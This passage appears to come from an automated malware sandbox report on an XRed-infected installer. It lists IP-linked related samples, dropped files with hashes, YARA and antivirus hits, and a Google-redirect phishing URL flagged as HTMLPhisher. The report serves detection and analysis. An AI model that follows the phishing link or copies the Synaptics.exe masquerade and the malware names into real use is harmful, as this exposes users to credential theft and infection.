                                                                                                            https://www.google.dk/url?sa=https://abc123xyz456def789ghj101klm112nop345qrs678tuv901wxyz234abc567d&rct=j&q=&esrc=s&source=web&cd=&cad=rja&uact=8&ved=2ahUKEwiX6tO39MiJAxUSnP0HHcggDNwQFnoECBoQAQ&url=amp%2F%62%68%61%72%61%74%68%73%65%72%76%69%63%65%73%69%6E%64%69%61%2E%63%6F%6D%2F%75%6E%73%75%62%73%63%72%69%62%65%2Fab86aa851e981834b77805f77a6cca34%2Fcm9yeWdvd2VyQHF1YW50ZXhhLmNvbQ==&token=fgj784jkh23&referrerID=xyz456789&sessionKey=abc123456789&trackingID=klmn987654&clickID=7890abcd1234&userID=xyz901234&pageID=web23456789Get hashmaliciousHTMLPhisher, Mamba2FABrowse
                                                                                                            • 13.107.246.45
                                                                                                            https://www.cognitoforms.com/f/QJDkMg1ACkylvn0c20THNA/1Get hashmaliciousUnknownBrowse
                                                                                                            • 13.107.246.45
                                                                                                            file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                            • 94.245.104.56
                                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                                            • 13.107.246.44
                                                                                                            AWKNET-LLCUSBank Information Details.batGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                            • 69.42.215.252
                                                                                                            System Volume Information.exeGet hashmaliciousXRedBrowse
                                                                                                            • 69.42.215.252
                                                                                                            P4.exeGet hashmaliciousXRedBrowse
                                                                                                            • 69.42.215.252
                                                                                                            Supplier RFQ ID 365242213q___________________________pdf.exeGet hashmaliciousSnake Keylogger, XRedBrowse
                                                                                                            • 69.42.215.252
                                                                                                            Synaptics.exeGet hashmaliciousXRedBrowse
                                                                                                            • 69.42.215.252
                                                                                                            9BXz5oZUMh.elfGet hashmaliciousUnknownBrowse
                                                                                                            • 67.220.95.213
                                                                                                            Vxy5RbbhIU.elfGet hashmaliciousUnknownBrowse
                                                                                                            • 67.220.95.213
                                                                                                            gXYPejHot8.elfGet hashmaliciousUnknownBrowse
                                                                                                            • 67.220.95.213
                                                                                                            hwfx5XCqGs.elfGet hashmaliciousUnknownBrowse
                                                                                                            • 67.220.95.213
                                                                                                            iOdhAV91gt.elfGet hashmaliciousUnknownBrowse
                                                                                                            • 67.220.95.213
                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            a0e9f5d64349fb13191bc781f81f42e1file.exeGet hashmaliciousLummaCBrowse
                                                                                                            • 13.107.246.45
                                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                                            • 13.107.246.45
                                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                                            • 13.107.246.45
                                                                                                            pPAvbVl3HM.exeGet hashmaliciousLummaCBrowse
                                                                                                            • 13.107.246.45
                                                                                                            7b9HZNvZwL.exeGet hashmaliciousLummaCBrowse
                                                                                                            • 13.107.246.45
                                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                                            • 13.107.246.45
                                                                                                            CheatInjector.exeGet hashmaliciousLummaCBrowse
                                                                                                            • 13.107.246.45
                                                                                                            Jorieh.exeGet hashmaliciousLummaCBrowse
                                                                                                            • 13.107.246.45
                                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                                            • 13.107.246.45
                                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                                            • 13.107.246.45
                                                                                                            37f463bf4616ecd445d4a1937da06e199RM52QaURq.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                            • 142.250.186.78
                                                                                                            • 142.250.185.78
                                                                                                            • 142.250.185.65
                                                                                                            HZ1BUCfTne.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                            • 142.250.186.78
                                                                                                            • 142.250.185.78
                                                                                                            • 142.250.185.65
                                                                                                            9RM52QaURq.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                            • 142.250.186.78
                                                                                                            • 142.250.185.78
                                                                                                            • 142.250.185.65
                                                                                                            bv2DbIiZeK.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                            • 142.250.186.78
                                                                                                            • 142.250.185.78
                                                                                                            • 142.250.185.65
                                                                                                            brozer.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                            • 142.250.186.78
                                                                                                            • 142.250.185.78
                                                                                                            • 142.250.185.65
                                                                                                            YU7jHNMJjG.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                            • 142.250.186.78
                                                                                                            • 142.250.185.78
                                                                                                            • 142.250.185.65
                                                                                                            6Ev0Nd7z2t.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                            • 142.250.186.78
                                                                                                            • 142.250.185.78
                                                                                                            • 142.250.185.65
                                                                                                            6HWYiong4s.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                            • 142.250.186.78
                                                                                                            • 142.250.185.78
                                                                                                            • 142.250.185.65
                                                                                                            btoRtc7o3v.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                            • 142.250.186.78
                                                                                                            • 142.250.185.78
                                                                                                            • 142.250.185.65
                                                                                                            HZ1BUCfTne.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                            • 142.250.186.78
                                                                                                            • 142.250.185.78
                                                                                                            • 142.250.185.65
                                                                                                            No context
                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):65536
                                                                                                            Entropy (8bit):1.216103302930749
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:wAEKw4Vps3Imo0WMn4DzJDzqjICB43pOe1IzuiFrZ24IO8EKDzy:j9y35WMn4JqjICFzuiFrY4IO8zy
                                                                                                            MD5:F963D7BD3FFC4BB6823DDA0E531055DE
                                                                                                            SHA1:E33D62462C29A5B74A3DD44B1C7668D6AC7D5849
                                                                                                            SHA-256:80951E04A0D9276F9BBC428A08D3CC68FA1DA4BE19777BDA648AC180575F7C60
                                                                                                            SHA-512:D9A0D851E5FF1C2C2B24168FB37700FCDA6F7642224A47D4BF06E4A2243F76986D843107D2FB81B8EF17556438ADE32630C22B55D869826FFEEB5505767E421B
                                                                                                            Malicious:false
                                                                                                            Reputation:low
                                                                                                            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.6.1.3.9.8.2.6.5.4.6.5.5.0.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.6.1.3.9.8.2.9.0.1.3.5.3.3.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.4.4.1.8.e.7.9.-.a.3.1.c.-.4.6.6.c.-.b.f.7.1.-.d.f.a.e.3.8.8.c.3.0.8.8.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.8.3.4.6.f.8.8.-.3.d.a.c.-.4.4.f.d.-.a.d.2.5.-.6.b.f.9.4.a.a.5.3.5.b.3.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.S.y.n.a.p.t.i.c.s...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.e.0.4.-.0.0.0.1.-.0.0.1.6.-.5.c.f.5.-.7.1.6.b.4.8.3.7.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.9.9.a.1.3.7.d.5.9.3.d.d.a.9.d.1.5.8.d.c.8.b.6.b.7.7.2.0.d.e.b.0.0.0.0.1.f.0.4.!.0.0.0.0.7.4.6.8.6.4.4.9.f.2.4.f.0.c.d.7.4.5.c.4.b.d.e.0.a.7.e.6.f.4.1.a.b.f.1.7.d.a.a.d.!.S.y.n.a.p.t.i.c.s...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.
                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):65536
                                                                                                            Entropy (8bit):1.1271286918528969
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:wXufRYVpsqIm00jMAiDzJDzqjUr4B9lZlSzuiFwZ24IO8EKDzy:OyqVjMAiJqjhWzuiFwY4IO8zy
                                                                                                            MD5:5E95E37275D8F05D3F2BBE0C4788E42F
                                                                                                            SHA1:F1E42177CD20A5EFB67E0369BCBDE791708F8168
                                                                                                            SHA-256:732D505AC190A11515F028AF6035B080787A585906D47A16657C2B6E1DC3F01B
                                                                                                            SHA-512:80B7866E09EAC1769F2D0E73C00E027356ADCC102E0C3D4364B8592A86C0F1CF390345C7FB2127ECF5A2BFC7E510B0275D1622318F5FE609CAFF669D429E77F9
                                                                                                            Malicious:false
                                                                                                            Reputation:low
                                                                                                            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.6.1.3.9.8.9.6.2.0.0.0.9.1.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.6.1.3.9.8.9.9.4.9.7.0.8.7.0.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.f.b.1.8.f.9.3.-.5.a.9.5.-.4.c.7.2.-.8.1.2.e.-.9.4.2.9.7.8.9.f.d.c.a.8.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.2.9.8.8.8.f.9.-.6.7.9.1.-.4.2.9.5.-.b.f.2.1.-.e.a.0.d.8.4.5.c.2.6.e.e.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.S.y.n.a.p.t.i.c.s...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.7.a.8.-.0.0.0.1.-.0.0.1.6.-.3.2.e.6.-.f.d.9.0.4.8.3.7.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.9.9.a.1.3.7.d.5.9.3.d.d.a.9.d.1.5.8.d.c.8.b.6.b.7.7.2.0.d.e.b.0.0.0.0.1.f.0.4.!.0.0.0.0.7.4.6.8.6.4.4.9.f.2.4.f.0.c.d.7.4.5.c.4.b.d.e.0.a.7.e.6.f.4.1.a.b.f.1.7.d.a.a.d.!.S.y.n.a.p.t.i.c.s...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.
                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                            File Type:Mini DuMP crash report, 15 streams, Fri Nov 15 10:23:47 2024, 0x1205a4 type
                                                                                                            Category:dropped
                                                                                                            Size (bytes):2149838
                                                                                                            Entropy (8bit):1.8519731967696436
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3072:+Ws3u3+sCB1K4Iyygerd7hKCKk569lO7F/+yDoymTe71rS2YSmIB2PlFRY6:+BylCB0mmIqSiFWyDoymTep3CIBsHRj
                                                                                                            MD5:5AC93D956CFFFD0BE4179DBB28D47A9F
                                                                                                            SHA1:27E11F52D500C13F87C561CA0495F865CE547F00
                                                                                                            SHA-256:55E41FFF9EE3627EA42C5CFA59CE57332F82CE0F4D47BC981E84A6D03F8BF185
                                                                                                            SHA-512:C29BBE929C3792E20AB4E77E60315E7553339C7989E00F3BFC8E760F1735496E9882222EB998C9A9222D62130AE50DAFD9F59195C3F5A4559B3FF032E66318AD
                                                                                                            Malicious:false
                                                                                                            Reputation:low
                                                                                                            Preview:MDMP..a..... .......3!7g............t...........$%..........$....C.......8.............`.......8...........T................. ..........C...........E..............................................................................eJ......TF......GenuineIntel............T...........#!7g.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):6302
                                                                                                            Entropy (8bit):3.715501303193612
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:R6l7wVeJBxg6pTUYiSWhpDO89beGsfD0qm:R6lXJw6pgYuTelfDI
                                                                                                            MD5:529A95CE878B5C135E46779ADB043B30
                                                                                                            SHA1:4333173D4686CB1D754DB527F01FA9E7B1685A4F
                                                                                                            SHA-256:61B885178C40BCF7E7F4E6532D67BBF2B353A82D9F6170C95AB8B8A91654CF19
                                                                                                            SHA-512:61B09F595CD56CA498279796F2EFC039EEC6FCAE5EA27DACB8BF7C89946201F78A836106213614E59F583F07DD8C8288CB3C156DF8F0D0EAE4E48E2EEF9F4E3D
                                                                                                            Malicious:false
                                                                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.5.8.8.<./.P.i.
                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):4572
                                                                                                            Entropy (8bit):4.451316805190285
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:48:cvIwWl8zs26Jg77aI9YznWda80atYm8M4JFetF5Wj+q84iSMWDfZM9d:uIjfjI7KKdlEJ9jrBfZad
                                                                                                            MD5:834687261BA6E299835CFE3DC70EC435
                                                                                                            SHA1:6C957F13B261F93AE5789D64F13089D8B2AE2963
                                                                                                            SHA-256:45DCB8F75D42BB44659BE7288FCA56902A5C4DAE1470E393DC4A4EE76C351B4F
                                                                                                            SHA-512:F5CBC27385393017BB0D92A8298A7FB9BCF827645DF38DD5CD73EB7CAD17C16CF8E6EA95DFE70453F163D7B98913F7A7D1A4E48A9FD9CB6D5E703E72154D9402
                                                                                                            Malicious:false
                                                                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="589046" />.. <arg nm="osinsty" val="2" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                            File Type:Mini DuMP crash report, 15 streams, Fri Nov 15 10:24:56 2024, 0x1205a4 type
                                                                                                            Category:dropped
                                                                                                            Size (bytes):2775412
                                                                                                            Entropy (8bit):1.9672989242468784
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:6144:8xF6WIUMWJtkGXLIfUQWH/WeF+s7GBCZItcZzwcQ7a/x3r5lbkine1RisR0b1ZGv:8xFAUMWJeFUQWH/WnssWZ8m/xje2Gnv
                                                                                                            MD5:A3376BB451A175C40747AAB360988D09
                                                                                                            SHA1:CF7F694304002EF5DFB3DDC95DF0508211908BAD
                                                                                                            SHA-256:9C5F9C4FB24013712679066768C33705E549A39BC51CB61E00A6E375BDB3CF7E
                                                                                                            SHA-512:D51078BCB98D2B9CE635EF7BD762CEE36218C677DD10A63AD43703B2CFED19CC232F5C5D68113410DD21E81C262B4F76B1A7602C46D0B5492458A6AC046AC60A
                                                                                                            Malicious:false
                                                                                                            Preview:MDMP..a..... .......x!7g.............$..........<....,......$...DK.......b..P...........`.......8...........T................b).........hK..........TM..............................................................................eJ.......M......GenuineIntel............T...........b!7g............................. ..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):8326
                                                                                                            Entropy (8bit):3.696846182458597
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:R6l7wVeJox+6R6YN4SUvgmfiS65pDM89bhn1sf1Lm:R6lXJ16R6YySUvgmfClhnOfE
                                                                                                            MD5:ECCBBA567B737F851766BFF776508E19
                                                                                                            SHA1:010EA91EED287C22603A6E28C347207A9F7CE4A3
                                                                                                            SHA-256:4E05F2BE96FCBA5485B66C7412F4E9975958EF76FFC3E638821D4AD0CFF70039
                                                                                                            SHA-512:9E243BC85EF619F82329263BD918422BCBCAD5B16F33638E1C9B7EBC033B5AE7F993D429B6A52A3188FC194AC10AB6B055E3FF88133B1131173D7B25D386B1E0
                                                                                                            Malicious:false
                                                                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.0.5.6.<./.P.i.
                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):4572
                                                                                                            Entropy (8bit):4.450340562950747
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:48:cvIwWl8zs2RJg77aI9YznWda80anYm8M4JFmFd+q841MWDfZedd:uIjfII7KKdlyJA7BfZedd
                                                                                                            MD5:A84B0CDB46AE52E6B6C5BC5E1749F230
                                                                                                            SHA1:8E39EC258D6846E5D79E8E78A48E717892C115CC
                                                                                                            SHA-256:94807D1C1494169B49CAE5B3D2EB2F8451CD3676F8C9B3FC6CD1D1F1A8735EA5
                                                                                                            SHA-512:7398F7060FED63524B06B4C4EBB18A67ED35D439D08D3B4FA2F0C911BEBDCCAB1CFB7903B3165D71334C9A391FD0D2E44E7DB6BC4D9AD40DE5D73714DCFFD45C
                                                                                                            Malicious:false
                                                                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="589047" />.. <arg nm="osinsty" val="2" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                            Process:C:\Users\user\Desktop\Dzsb.Qyd.Install.exe
                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                            Category:modified
                                                                                                            Size (bytes):771584
                                                                                                            Entropy (8bit):6.632404275608864
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12288:aMSApJVYG5lDLyjsb0eOzkv4R7QnvUUilQ35+6G75V9I3r:ansJ39LyjbJkQFMhmC+6GD9c
                                                                                                            MD5:921D4ED8B1BD7EFFC64D14DF5204C817
                                                                                                            SHA1:74686449F24F0CD745C4BDE0A7E6F41ABF17DAAD
                                                                                                            SHA-256:479FFD1BD8ADB0CBABA12207B91F58BAE92FE5F49FF2A8D4354853463638514E
                                                                                                            SHA-512:3C6CCCD09E06E11D4EDA44172C908DD0AD61D89B5957F9EB5575F6A6A43026FAAF13486ACA409399C4FE344CEC1ADF3BE0257926A863B9978C44469E16440A7F
                                                                                                            Malicious:true
                                                                                                            Yara Hits:
                                                                                                            • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\ProgramData\Synaptics\RCXE0B2.tmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\RCXE0B2.tmp, Author: Joe Security
                                                                                                            Antivirus:
                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                            • Antivirus: ReversingLabs, Detection: 88%
                                                                                                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................&....................@.......................... ...................@..............................B*...........................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                            Process:C:\Users\user\Desktop\Dzsb.Qyd.Install.exe
                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):941568
                                                                                                            Entropy (8bit):6.484741061010045
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12288:kMSApJVYG5lDLyjsb0eOzkv4R7QnvUUilQ35+6G75V9yjQ2WH95Cjs7:knsJ39LyjbJkQFMhmC+6GD9uQ2e9Qo
                                                                                                            MD5:8F6F7010F18C00958433F02D47130DD1
                                                                                                            SHA1:96420693A48930B1420DCA7C5D02792EA7009693
                                                                                                            SHA-256:F20191F25CC57EE5C30328A5BD3821788D8DB2ED60901F728122D596185FC651
                                                                                                            SHA-512:41E6F0B9458EC1CC304B606602BBE8289522E0AC4183C64C3AE434D54792707EB061E9F3746339B745CF6BA7B511A9D6DB7DBAE94ACAFF75255FAE3EBE0521FB
                                                                                                            Malicious:true
                                                                                                            Yara Hits:
                                                                                                            • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                                            Antivirus:
                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*..........................................@..............................................@..............................B*......p....................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...p...........................@..P....................................@..P........................................................................................................................................
                                                                                                            Process:C:\Users\user\Desktop\Dzsb.Qyd.Install.exe
                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):26
                                                                                                            Entropy (8bit):3.95006375643621
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:ggPYV:rPYV
                                                                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                            Malicious:true
                                                                                                            Preview:[ZoneTransfer]....ZoneId=0
                                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1652
                                                                                                            Entropy (8bit):5.263309453515148
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24:GgsF+0SSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+J+pAZewRDK4mW
                                                                                                            MD5:B7AEFE43153A5137230B145F07FB211F
                                                                                                            SHA1:9F13135E1B25BF4831419948B96814650F9452B2
                                                                                                            SHA-256:BAB1B34EEF52E44498D79BA951A2A5AB69E6AD4F22B1958F040F4550B977D0C5
                                                                                                            SHA-512:9A0C88D79494FD2C393E060107B9072F48A327E275BAFFC5F733BF22585AE3E5C6CBCB48DCE9438937204E49B68C5E57E5FFBDA46725615E9FCE9422F46815FA
                                                                                                            Malicious:false
